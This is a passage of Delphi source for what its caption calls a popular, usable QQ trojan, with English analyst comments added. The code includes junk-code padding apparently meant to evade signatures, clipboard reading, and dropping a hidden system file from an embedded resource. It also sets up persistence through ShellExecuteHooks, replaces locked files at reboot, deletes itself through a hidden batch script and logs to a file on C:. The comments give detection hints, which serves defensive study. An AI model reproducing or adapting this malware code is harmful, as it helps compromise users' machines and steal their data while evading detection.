
📄 tonghan.pas

📁 这是目前很流行的QQ木马 的代码 现在 这个很使用的
    Module32First(ModuleHandle, ModuleStruct);
    getMyFileName := ModuleStruct.szExePath;
end;
// Returns True when every character of Str is a decimal digit ('0'..'9').
// An empty string contains no offending character, so it also yields True.
function IsNumString(const Str: string): Boolean;
var
  Idx: Integer;
begin
  Idx := 1;
  // Skip over the leading run of digits.
  while (Idx <= Length(Str)) and (Str[Idx] >= '0') and (Str[Idx] <= '9') do
    Inc(Idx);
  // The string is all digits only if the scan ran past its end.
  Result := Idx > Length(Str);
end;
// Case-insensitive string equality, evaluated with the user's default locale.
function CompareAnsiText(const S1, S2: string): Boolean;
var
  Outcome: Integer;
begin
  // A length of -1 tells CompareString that the input is null-terminated.
  Outcome := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE,
    PChar(S1), -1, PChar(S2), -1);
  // CompareString returns 2 for "equal" (1 = less, 3 = greater, 0 = failure).
  Result := (Outcome = 2);
end;


// Read the info blob appended to the tail of FileName (per the original
// comment this is the program's own file; callers are outside this excerpt).
//
// Layout as read here: the last 4 bytes of the file hold a length that has been
// XOR-ed with $4D617A69. The function seeks back that many bytes from the end
// of the file, reads up to end-of-file and returns the bytes as a string, so
// the returned data includes the 4-byte length field itself.
// Returns '' when the file cannot be opened or the decoded length exceeds the
// file size.
//
// Analyst notes:
// - The repeated "if laji = ... then ... else ..." blocks are filler: laji is
//   never assigned in this function and a/b/c are never read, so they do not
//   influence the result. Presumably they only pad the routine; a detection
//   should key on the trailer logic rather than on the exact code layout.
// - Extra data stored at the end of an executable, closed by a 4-byte masked
//   length, is the file-level trait to look for when triaging samples.
// - NOTE(review): the Exit taken on the size check skips CloseHandle, the
//   ReadFile results are not checked, and Result[1] is referenced even if the
//   decoded length is 0.
function GetExtraInfo(FileName: string): string;
var
  hFile, WSize, Len: DWORD;
var
a:string;
b:string;
c:string;
laji:string;
begin
// Filler block (no effect on the result); the same pattern recurs below.
if laji = 'fgggggggrfffffffffgggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  Result := '';

  // Open the file read-only; give up silently if that fails.
  hFile := CreateFile(PChar(FileName), GENERIC_READ,
    FILE_SHARE_READ, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
  if (hFile = INVALID_HANDLE_VALUE) then Exit;
 if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  // Position on the 4-byte trailer at the very end of the file.
  SetFilePointer(hFile, -4, nil ,FILE_END);
if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  // Read the masked length value.
  ReadFile(hFile, Len, 4, WSize, nil);
if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  Len := Len xor $4D617A69;  // decode the info length
  // Sanity check: a length larger than the whole file cannot be valid.
  if (Len > GetFileSize(hFile, nil)) then Exit;

  // Seek back Len bytes from end-of-file, to the start of the blob.
  SetFilePointer(hFile, -Len, nil ,FILE_END);
  if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  SetLength(Result, Len);
  if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  // Read the blob straight into the result string's buffer.
  ReadFile(hFile, Result[1], Len, WSize, nil);
  if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  CloseHandle(hFile);
end;

// Get the clipboard contents: returns the CF_TEXT data currently on the
// clipboard as a string, opening the clipboard on behalf of window `hand`.
//
// Analyst notes:
// - This routine reads whatever text the user last copied. In a sample
//   described on this page as a QQ trojan, clipboard reads by a process with no
//   visible UI are a behaviour worth alerting on.
// - NOTE(review): pGlobal is only assigned when GetClipboardData succeeds, yet
//   it is converted to the result unconditionally, and that conversion happens
//   after GlobalUnlock. Rect is never initialised and BeginPaint has no matching
//   EndPaint in this function. What DrawText paints is therefore unclear from
//   this excerpt.
function getjianban( hand: LongWord):string;
var
 hGlobal: DWORD;
 pGlobal: PChar;
 hWndDc: HDC;
 Rect: TRect;
 ps: TPaintStruct;
 begin
     Result := '';
        hWndDc := BeginPaint(hand, ps);
        OpenClipboard(hand); // open the clipboard
        hGlobal := GetClipboardData(CF_TEXT); // get the memory block holding the text
        if (hGlobal <> 0) then // obtained
        begin
          pGlobal := GlobalLock(hGlobal); // lock
          DrawText(hWndDc, pGlobal, -1, Rect, DT_EXPANDTABS); // draw
          GlobalUnlock(hGlobal); // unlock
        end;
        CloseClipboard(); // close the clipboard
        Result := pGlobal;
end;

// Strip leading and trailing characters <= ' ' (spaces and control characters).
function Trim(const S: string): string;
var
  First, Last: Integer;
begin
  Result := '';
  Last := Length(S);
  First := 1;
  while (First <= Last) and (S[First] <= ' ') do
    Inc(First);
  // Empty or all-blank input: keep the empty result.
  if First > Last then Exit;
  // A non-blank character exists at First, so this backward scan stops there at the latest.
  while S[Last] <= ' ' do
    Dec(Last);
  Result := Copy(S, First, Last - First + 1);
end;
// Get a window's text by sending it WM_GETTEXT.
function GetCaption(hWnd: LongWord): string;
var
  TextBuf: array[0..MAX_PATH] of Char;
  Copied: Integer;
begin
  // The message result is the number of characters copied into the buffer.
  Copied := SendMessage(hWnd, WM_GETTEXT, MAX_PATH, Integer(@TextBuf[0]));
  // Terminate explicitly at the reported length before converting.
  TextBuf[Copied] := #0;
  Result := TextBuf;
end;

  // Get the window class name of hWnd ('' when GetClassName reports 0 characters).
function GetWinClass(hWnd: LongWord): string;
var
  NameBuf: array[0..MAX_PATH] of Char;
  NameLen: Integer;
begin
  NameLen := GetClassName(hWnd, NameBuf, MAX_PATH);
  // Terminate at the length the API reported, then convert to a string.
  NameBuf[NameLen] := #0;
  Result := NameBuf;
end;




  // Get the text of an edit control through GetWindowText.
function GetEditText(hWndEdit: LongWord): string;
var
  EditBuf: array[0..MAX_PATH] of Char;
  EditLen: Integer;
begin
  EditLen := GetWindowText(hWndEdit, EditBuf, MAX_PATH);
  // Terminate at the length the API reported, then convert to a string.
  EditBuf[EditLen] := #0;
  Result := EditBuf;
end;

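  // Convert an integer to its decimal string representation.
  // Handles the full Integer range, including Low(Integer).
function InttoStr(const Int: Integer): string;
var
  Digit, Rest: Integer;
begin
  if Int = 0 then
  begin
    Result := '0';
    Exit;
  end;
  // Work on the non-positive value: negating Low(Integer) overflows, whereas
  // every positive Integer has a representable negative counterpart.
  if Int > 0 then Rest := -Int else Rest := Int;
  Result := '';
  while Rest <> 0 do
  begin
    // mod takes the sign of the dividend, so the remainder lies in -9..0.
    Digit := -(Rest mod 10);
    Rest := Rest div 10;
    Result := Char(Digit + Ord('0')) + Result;
  end;
  if Int < 0 then Result := '-' + Result;
end;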

// Convert a string to an integer via Val; the error position is discarded.
function StrToInt(const S: string): Integer;
var
  ErrPos: Integer;
begin
  // Val stores the parsed number in Result and the index of the first
  // offending character (0 on success) in ErrPos, which is not inspected here.
  Val(S, Result, ErrPos);
end;

  // Release a resource to a file.   Parameters: type, name, location, extra info.
  //
  // Looks up resource ResName/ResType in this module, writes its bytes to
  // FileName, then appends ExtraInfo directly after them. Does nothing when
  // ExtraInfo is empty or any resource lookup step fails.
  //
  // Analyst notes:
  // - The output file is created with CREATE_ALWAYS (an existing file is
  //   overwritten) and with the HIDDEN and SYSTEM attributes set, so it does not
  //   show in a default Explorer view; enumerate with attributes included when
  //   hunting for it.
  // - The written file is "embedded resource + trailing data". Whether ExtraInfo
  //   carries the masked 4-byte length that GetExtraInfo expects cannot be told
  //   from this excerpt; presumably the caller builds it that way.
  // - NOTE(review): WriteFile results are not checked.
procedure ReleaseResToFile(ResType, ResName, FileName: PChar; const ExtraInfo: string);
var
  HResInfo, HGlobal, FHandle, FSize, WSize: LongWord;
  FMemory: Pointer;
begin
  // Without extra info nothing is written at all.
  if (ExtraInfo = '') then Exit;

  // Locate, load and lock the embedded resource.
  HResInfo := FindResource(hInstance, ResName, ResType);
  if (HResInfo = 0) then Exit;

  HGlobal := LoadResource(hInstance, HResInfo);
  if (HGlobal = 0) then Exit;

  FMemory := LockResource(HGlobal);
  if (FMemory = nil) then Exit;

  // Create (or overwrite) the target as a hidden system file, unshared.
  FHandle := CreateFile(FileName, GENERIC_READ or GENERIC_WRITE,
    0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_SYSTEM, 0);
  if (FHandle = INVALID_HANDLE_VALUE) then Exit;

  // First the resource bytes ...
  FSize := SizeOfResource(hInstance, HResInfo);
  WriteFile(FHandle, FMemory^, FSize, Wsize, nil);

  // ... then the extra info, appended at the tail.
  FSize := Length(ExtraInfo);
  WriteFile(FHandle, ExtraInfo[1], FSize, Wsize, nil);

  SetEndofFile(FHandle);
  CloseHandle(FHandle);

  UnlockResource(HGlobal);
  FreeResource(HGlobal);
end;

  // 释放路径
{function GetReleasePath(): string;
var
  Buffer: array[0..255] of Char;
var
a:string;
b:string;
c:string;
laji:string;

begin
if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  if (GetSystemDirectory(Buffer, 255) = 0) then Buffer[0] := 'C';
if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  if (IsCharAlpha(Buffer[0]) = False) then Buffer[0] := 'C';
if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  Result := Buffer[0] + ':\Program Files\Common Files\Microsoft Shared\MSINFO\';
end;
      }

  // Add a registry entry.   Parameters: root key, path, value name, value data.
  //
  // Creates or opens RootKey\StrPath and writes StrData as a REG_SZ value named
  // StrName (an empty name addresses the key's default value).
  //
  // Analyst notes:
  // - The key is requested with KEY_ALL_ACCESS. Writes under HKEY_LOCAL_MACHINE
  //   or HKEY_CLASSES_ROOT therefore depend on the process being privileged.
  // - NOTE(review): no API result is checked, so a failed create or open is
  //   followed by RegSetValueEx and RegCloseKey on a zero handle and the caller
  //   never learns of it.
procedure SetStrValue(RootKey: HKEY; StrPath, StrName, StrData: PChar);
var
  TempKey: HKey;
  Disposition, DataSize: LongWord;
begin
  TempKey := 0;
  Disposition := REG_CREATED_NEW_KEY;
  RegCreateKeyEx(RootKey, StrPath, 0, nil, 0, KEY_ALL_ACCESS, nil, TempKey, @Disposition);

  // Size passed to the API includes the terminating null character.
  DataSize := lstrlen(StrData) + 1;
  RegSetValueEx(TempKey, StrName, 0, REG_SZ, StrData, DataSize);

  RegCloseKey(TempKey);
end;

  // Add a URL execution hook.   Parameter: hook file name.
  //
  // Registry writes performed through SetStrValue:
  //   HKLM\<HookPath>                         value <HookName> = ''
  //   HKCR\CLSID\<HookName>                   (default) = ''
  //   HKCR\CLSID\<HookName>\InProcServer32    (default) = ComFileName
  //   HKCR\CLSID\<HookName>\InProcServer32    ThreadingModel = 'Apartment'
  //
  // Analyst notes:
  // - Together these register ComFileName as an in-process COM server and list
  //   its CLSID under ShellExecuteHooks, a registry load point that causes the
  //   shell to load the DLL. It is a persistence mechanism, not a one-off run.
  // - Detection: alert on new values under the ShellExecuteHooks key and on
  //   InProcServer32 entries that point at unexpected or hidden DLLs. The fixed
  //   CLSID in HookName is a host indicator for this sample.
  // - Clean-up has to cover both the hook value and the CLSID subtree; removing
  //   only one leaves a dangling reference behind.
procedure RegisterDll(ComFileName: PChar);
const
  HookPath = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks';
  HookName = '{91B1E846-2BEF-4345-8848-7699C7C9935F}';
var
  sTemp: string;
begin
  // List the CLSID as a ShellExecute hook.
  SetStrValue(HKEY_LOCAL_MACHINE, HookPath, HookName, '');

  // Create the COM class key itself.
  sTemp := 'CLSID\' + HookName;
  SetStrValue(HKEY_CLASSES_ROOT, PChar(sTemp), '', '');

  // Point the class at the DLL and declare its threading model.
  sTemp := sTemp + '\InProcServer32';
  SetStrValue(HKEY_CLASSES_ROOT, PChar(sTemp), '', ComFileName);
  SetStrValue(HKEY_CLASSES_ROOT, PChar(sTemp), 'ThreadingModel', 'Apartment');
end;

  // Reports whether the platform is anything other than NT; the original
  // comment labels that case as "running on a 9x operating system".
function IsWindows9x(): Boolean;
var
  VerInfo: TOSVersionInfo;
begin
  // The structure size must be filled in before the call.
  VerInfo.dwOSVersionInfoSize := SizeOf(VerInfo);
  GetVersionEx(VerInfo);
  Result := not (VerInfo.dwPlatformID = Ver_Platform_Win32_NT);
end;



  // Rename a file (after reboot): schedules Source to replace Target at the
  // next restart instead of moving it immediately.
  //
  // - Non-NT platforms: writes "Target=Source" (short path names) into the
  //   [rename] section of wininit.ini.
  // - NT platforms: MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT and
  //   MOVEFILE_REPLACE_EXISTING.
  //
  // Analyst notes:
  // - A delayed replace lets a file that is locked while in use be swapped out
  //   at boot. On NT, delayed moves are recorded in the Session Manager
  //   PendingFileRenameOperations registry value (documented Windows behaviour),
  //   which can be inspected before rebooting a suspect host. On 9x, inspect
  //   wininit.ini.
  // - NOTE(review): GetShortPathName results are not checked, so the buffers
  //   may be uninitialised when a path does not exist yet.
procedure ForceMoveFile(const Target, Source: string);
var
  Target_Buffer: array[0..MAX_PATH] of Char;
  Source_Buffer: array[0..MAX_PATH] of Char;
begin
  if IsWindows9x() then
  begin
    GetShortPathName(PChar(Target), Target_Buffer, MAX_PATH);
    GetShortPathName(PChar(Source), Source_Buffer, MAX_PATH);
    WritePrivateProfileString('rename', Target_Buffer, Source_Buffer, 'wininit.ini');
  end else
  begin
    MoveFileEx(PChar(Source), PChar(Target), MOVEFILE_DELAY_UNTIL_REBOOT or MOVEFILE_REPLACE_EXISTING);
  end;
end;

  // Extract the path: FullName up to and including its last '\' or ':'
  // (an empty string when neither character occurs).
function ExtractFilePath(const FullName: string): string;
var
  Cut: Integer;
begin
  Cut := Length(FullName);
  // Walk backwards until a path delimiter is found or the start is passed.
  while Cut > 0 do
  begin
    if (FullName[Cut] = '\') or (FullName[Cut] = ':') then Break;
    Dec(Cut);
  end;
  Result := Copy(FullName, 1, Cut);
end;

  // Delete itself: removes the running executable from disk via a helper batch file.
  //
  // Writes "_xr.bat" into the executable's own directory. The script loops,
  // deleting the executable (ParamStr(0)) until it no longer exists, then deletes
  // itself with "del %0". The script is started through ShellExecute with
  // SW_HIDE, so no console window is shown.
  //
  // Analyst notes:
  // - Self-deletion removes the original file after it has run. On a suspect
  //   host the artefacts to look for are the "_xr.bat" name, a hidden command
  //   interpreter spawned by the sample, and a process whose image file is no
  //   longer on disk.
  // - NOTE(review): Rewrite raises an I/O error if the directory is not
  //   writable; nothing here handles that.
procedure DeleteMe();
var
  BatchFile: TextFile;
  BatchFileName: string;
begin
  BatchFileName := ExtractFilePath(ParamStr(0)) + '_xr.bat';
  AssignFile(BatchFile, BatchFileName);
  Rewrite(BatchFile);

  // Retry loop: the delete fails while the executable is still running.
  Writeln(BatchFile, ':try');
  Writeln(BatchFile, 'del "' + ParamStr(0) + '"');
  Writeln(BatchFile, 'if exist "' + ParamStr(0) + '"' + ' goto try');
  // Finally the batch file removes itself.
  Writeln(BatchFile, 'del %0');
  CloseFile(BatchFile);

  ShellExecute(0, 'open', PChar(BatchFileName), nil, nil, SW_HIDE);
end;
 // Get the current local date folded into a single number, returned as a string.
function getNowDay:string;
var
 LocalNow: TSystemTime;
 DayNumber: Integer;
begin
 GetLocalTime(LocalNow);
 // Rough day counter (365 per year, 30 per month), not a true calendar day count.
 DayNumber := LocalNow.wYear*365 + LocalNow.wMonth*30 + LocalNow.wDay;
 Result := inttostr(DayNumber);
end;
// Write to the "notepad" log: appends the line s to a fixed text file in the
// root of C:, creating the file if it does not exist yet.
//
// Analyst notes:
// - The hard-coded path is a host artefact of this sample. What gets logged is
//   decided by callers outside this excerpt, so treat the file as potentially
//   holding captured data when it is found on a machine.
// - NOTE(review): the file is opened and closed on every call and I/O errors
//   are not handled.
 procedure Log1( s : PChar);stdcall;
  var
    F : TextFile;
  begin
    assignfile(f,'c:\记事本.txt');
    // Append when the log already exists, otherwise create it.
    if fileexists('c:\记事本.txt') then append(f)
    else rewrite(f);
    writeln(f,s);
    closefile(f);
  end;
end.
